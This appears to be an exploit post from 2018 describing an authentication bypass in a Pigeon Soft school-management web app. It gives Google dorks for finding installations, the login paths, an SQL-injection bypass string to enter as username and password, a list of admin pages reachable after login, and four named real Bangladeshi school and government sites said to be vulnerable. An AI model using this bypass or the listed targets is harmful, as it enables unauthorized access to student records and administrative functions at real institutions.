facebook facebook twitter rss

WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability

Author: KingSkrupellos , Published: 04-11-2018
# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Developed By Pigeon Soft''
intext:''Powered By Pigeon Soft''
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ]

#################################################################################################

# Admin Panel Login Path :

/app/login.php
/wp-login.php

# Authentication Bypass Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php

#################################################################################################

# Example Vulnerable Sites =>

[+] bograpoly.gov.bd/app/index.php

[+] gmmhs.edu.bd/app/login.php

[+] gfisc.edu.bd/app/login.php

[+] itihasacademybd.com/app/login.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :